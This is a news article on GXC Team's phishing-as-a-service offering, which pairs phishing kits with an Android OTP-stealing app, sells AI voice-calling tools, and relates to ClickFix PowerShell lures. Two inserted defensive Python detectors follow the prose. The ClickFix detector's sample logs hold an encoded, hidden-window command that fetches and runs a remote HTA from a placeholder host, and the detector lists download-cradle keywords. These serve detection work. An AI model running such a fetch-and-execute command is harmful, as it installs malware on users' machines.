AI-Driven Cybercrime Service Merges Phishing Kits with Malicious Android Apps

  • GXC Team, a Spanish-speaking cybercriminal group, has advanced malware-as-a-service (MaaS) by combining phishing kits with malicious Android apps.
  • The phishing kits are priced between $150 and $900 per month; the full bundle, including Android malware, is available for around $500 per month.
  • The campaign targets Spanish financial institutions, tax and government services, e-commerce, banks, and cryptocurrency exchanges in various countries, with 288 phishing domains identified.
  • The GXC Team offers additional services including stolen banking credentials and custom coding-for-hire for other cybercriminal groups.
  • The team has integrated an SMS OTP stealer into their malware, capturing and forwarding one-time passwords to a Telegram bot.
  • AI-powered voice calling tools are also promoted, generating voice calls that mimic bank representatives to trick victims into providing sensitive information or performing actions.
  • AI voice cloning technology enhances the authenticity of phishing schemes, allowing attackers to impersonate trusted individuals.
  • Phishing kits with adversary-in-the-middle (AiTM) capabilities are popular for scaling phishing operations with lower technical barriers.
  • Researcher mr.d0x has highlighted the use of progressive web apps (PWAs) for creating convincing phishing pages with fake URL bars.
  • Phishing campaigns are evolving to use encoded URLs and unconventional social engineering tactics, such as obfuscated code execution in PowerShell.

Main AI News:

A Spanish-speaking cybercriminal organization known as GXC Team has recently advanced malware-as-a-service (MaaS) by integrating phishing kits with malicious Android applications. According to Group-IB, a Singaporean cybersecurity firm that has tracked this e-crime group since January 2023, the GXC Team’s operation is a “sophisticated AI-powered phishing-as-a-service platform.” The platform targets users of more than 36 Spanish banks, various governmental bodies, and 30 institutions worldwide.

The phishing kits offered by GXC Team are priced between $150 and $900 per month, while the complete package, which bundles the phishing kit with the Android malware, is sold on a subscription basis for approximately $500 per month. Their targets span Spanish financial institutions, tax and governmental services, e-commerce platforms, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. To date, researchers have identified around 288 phishing domains associated with this operation.

In addition to selling phishing kits, the GXC Team also engages in the sale of stolen banking credentials and offers custom coding-for-hire services to other cybercriminal groups targeting financial institutions and cryptocurrency businesses. Security researchers Anton Ushakov and Martijn van den Berk noted that the GXC Team has innovated beyond traditional phishing methods by incorporating an SMS OTP stealer into their malware. This malicious Android app, disguised as a legitimate banking application, requests permissions to become the default SMS application on the victim’s device, allowing it to intercept and exfiltrate one-time passwords (OTPs) and other sensitive messages to a Telegram bot controlled by the attackers.

Once installed, the app opens a genuine bank’s website within a WebView, enabling users to interact with the site normally. However, the app silently captures and forwards OTP codes to the attackers whenever an OTP prompt is triggered. This sophisticated approach marks a significant evolution in phishing tactics.
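The behaviour described above leaves a distinctive footprint in the app's manifest: an application that presents itself as a bank has no reason to register the broadcast receiver that only the default SMS handler may hold, or to request SMS permissions alongside network access. The following app-vetting check is an added example, not code from the article or from Group-IB's research. It parses a constructed AndroidManifest.xml (the package name, label, and class names are invented) with the standard library and flags the combination of a `SMS_DELIVER` receiver guarded by `BROADCAST_SMS`, SMS permissions, and `INTERNET`, which is the minimum an app needs to intercept OTPs and forward them somewhere.

```python
import xml.etree.ElementTree as ET

# Manifest attributes live in the "android" namespace; elements do not.
ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"
A_PERM = f"{{{ANDROID_NS}}}permission"
A_LABEL = f"{{{ANDROID_NS}}}label"

# Permissions needed to read, intercept and send SMS traffic.
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
}
# Only the default SMS app is allowed to receive this broadcast; declaring the
# receiver (guarded by BROADCAST_SMS) is what lets an app take over the SMS role.
SMS_DELIVER_ACTION = "android.provider.Telephony.SMS_DELIVER"
BROADCAST_SMS_PERM = "android.permission.BROADCAST_SMS"

# Constructed sample: shaped like the fake banking app described in the article.
# Package, label and class names are invented placeholders, not real indicators.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakebank">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Example Bank">
        <activity android:name=".MainActivity"/>
        <receiver android:name=".SmsReceiver"
                  android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed control: a banking-style app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.realbank">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Example Bank">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


def assess_manifest(xml_text: str) -> dict:
    """Return the SMS-related capabilities declared in a manifest and a verdict."""
    root = ET.fromstring(xml_text)
    requested = {el.get(A_NAME) for el in root.iter("uses-permission")}
    sms_permissions = sorted(requested & SMS_PERMISSIONS)
    has_internet = "android.permission.INTERNET" in requested

    # An SMS_DELIVER receiver protected by BROADCAST_SMS marks a default-SMS-app candidate.
    default_sms_handler = False
    for receiver in root.iter("receiver"):
        actions = {a.get(A_NAME) for a in receiver.iter("action")}
        if SMS_DELIVER_ACTION in actions and receiver.get(A_PERM) == BROADCAST_SMS_PERM:
            default_sms_handler = True

    app = root.find("application")
    label = app.get(A_LABEL, "") if app is not None else ""

    if default_sms_handler and sms_permissions and has_internet:
        verdict = "HIGH"      # can take over SMS and exfiltrate: OTP-stealer shape
    elif sms_permissions:
        verdict = "MEDIUM"    # reads SMS but does not claim the SMS role
    else:
        verdict = "LOW"

    return {
        "package": root.get("package"),
        "label": label,
        "sms_permissions": sms_permissions,
        "has_internet": has_internet,
        "default_sms_handler": default_sms_handler,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        print(assess_manifest(manifest))
```

In a real vetting pipeline the manifest would come from the decoded APK rather than an inline string; the point of the check is that a messaging app legitimately declares this receiver, whereas a "banking" app that does so while also holding `INTERNET` should be treated as an OTP-interception risk and investigated.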

The GXC Team also promotes AI-powered voice calling tools via a dedicated Telegram channel. These tools allow cybercriminals to generate voice calls to potential victims based on specific prompts directly from the phishing kit. The calls are designed to appear as though they come from banks, urging recipients to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other actions. This tactic enhances the deception of their scams and underscores the rapid integration of AI technologies into cybercrime.

Recent reports from Google-owned Mandiant emphasize the potential of AI-powered voice cloning to mimic human speech with “uncanny precision.” This capability facilitates more authentic-sounding phishing (or vishing) schemes, which can be used to gain initial access, escalate privileges, and move laterally within target systems. Such voice impersonation can deceive victims into disclosing confidential information, granting remote access, or transferring funds, exploiting the inherent trust associated with familiar voices.

Phishing kits equipped with adversary-in-the-middle (AiTM) capabilities are becoming increasingly popular as they reduce the technical barriers to executing large-scale phishing campaigns. Researcher mr.d0x has highlighted how progressive web apps (PWAs) can be leveraged to design convincing phishing login pages. By manipulating the user interface to display a fake URL bar, these kits deceive users into entering their credentials on fraudulent sites. AiTM phishing kits can also abuse fallback authentication methods on services that support passkeys, steering the login toward the less secure methods that remain enabled.

Phishing campaigns are also evolving their tactics. One is to embed links that have already been encoded by the URL-rewriting features of security tools such as Secure Email Gateways (SEGs), so that the phishing URL is wrapped in a trusted-looking form and evades scanning. Social engineering attacks have likewise introduced unconventional methods in which users are lured to seemingly legitimate but compromised websites and then prompted to manually copy, paste, and execute obfuscated code in a PowerShell terminal under the pretense of fixing a browser display issue. Researchers Yashvi Shah and Vignesh Dhatchanamoorthy of McAfee Labs, who track this activity under the moniker ClickFix, note that attackers hide Base64-encoded scripts inside seemingly legitimate error messages to execute malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, which in turn deploy malware like DarkGate and Lumma Stealer.
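The ClickFix chain described above is easy to spot in process-creation telemetry once the encoded command is decoded: PowerShell launched by the user's shell (the Run dialog or a terminal, so the parent is explorer.exe), a hidden window, and a `-EncodedCommand` argument whose decoded content fetches and runs an HTA. The detection below is an added example and is not McAfee's or the article's code. It runs over constructed, Sysmon-style `key=value` log lines (the timestamps, parent processes and the `PLACEHOLDER.invalid` host are invented; the encoded commands are built inline so the sample is exact), decodes the Base64 UTF-16LE payload, and separates "encoded but benign admin tooling" from the download-and-execute pattern.

```python
import base64
import re

# Constructed sample data: PowerShell's -EncodedCommand carries Base64 of UTF-16LE text,
# so the sample commands are encoded here rather than pasted from real telemetry.
def _enc(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    # ClickFix shape: user-launched parent, hidden window, encoded download-and-run of an HTA.
    'ts=2024-07-01T10:00:00Z parent=explorer.exe image=powershell.exe '
    f'cmdline="powershell.exe -w hidden -enc {_enc("mshta http://PLACEHOLDER.invalid/update.hta")}"',
    # Encoded but benign: admin tooling launched by a service host.
    'ts=2024-07-01T10:05:00Z parent=svchost.exe image=powershell.exe '
    f'cmdline="powershell.exe -EncodedCommand {_enc("Get-Service -Name Spooler")}"',
    # Not encoded at all.
    'ts=2024-07-01T10:06:00Z parent=cmd.exe image=powershell.exe '
    'cmdline="powershell.exe -File C:\\scripts\\backup.ps1"',
]

# Short and long spellings of the encoded-command switch, followed by the Base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)
# Substrings that, in a decoded command, indicate download-and-execute behaviour.
PAYLOAD_INDICATORS = (
    "mshta", ".hta", "iex", "invoke-expression",
    "downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
)
# Parents that mean a human typed or pasted the command rather than automation running it.
INTERACTIVE_PARENTS = {"explorer.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(line: str) -> dict:
    """Score one process-creation record for the ClickFix pattern."""
    parent_m = re.search(r"parent=(\S+)", line)
    cmd_m = re.search(r'cmdline="(.*)"$', line)
    parent = parent_m.group(1).lower() if parent_m else ""
    cmdline = cmd_m.group(1) if cmd_m else ""

    decoded = decode_encoded_command(cmdline)
    reasons = []
    hits = []
    if decoded is not None:
        reasons.append("encoded_command")
        hits = [ind for ind in PAYLOAD_INDICATORS if ind in decoded.lower()]
        if hits:
            reasons.append("payload_indicators:" + ",".join(hits))
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden_window")
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent:" + parent)

    payload = bool(hits)
    return {
        "parent": parent,
        "decoded": decoded,
        "reasons": reasons,
        # Download-and-execute content is suspicious on its own; the ClickFix shape adds
        # a user-launched parent and/or a hidden window on top of it.
        "suspicious": payload,
        "clickfix_pattern": payload and ("hidden_window" in reasons or parent in INTERACTIVE_PARENTS),
    }


def scan(lines):
    return [classify(line) for line in lines]


if __name__ == "__main__":
    for result in scan(SAMPLE_LOGS):
        print(result["suspicious"], result["clickfix_pattern"], result["reasons"])
```

The decoding step matters more than the indicator list: encoded commands are common in legitimate automation, so alerting on `-enc` alone produces noise, whereas decoding and then checking for `mshta`/`.hta` or download-cradle strings, combined with an interactive parent, isolates the copy-and-paste-from-a-fake-error-page behaviour the article describes.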

Conclusion:

The integration of advanced AI technologies into phishing and malware services by the GXC Team signifies a significant shift in the sophistication of cybercrime. The use of AI for creating more convincing phishing schemes and malware reflects an alarming trend towards highly effective, scalable attacks. This evolution in cybercrime necessitates enhanced cybersecurity measures and sophisticated detection methods to safeguard against increasingly advanced and deceptive tactics employed by cybercriminals. The market must adapt by investing in advanced security technologies and strategies to combat these emerging threats effectively.
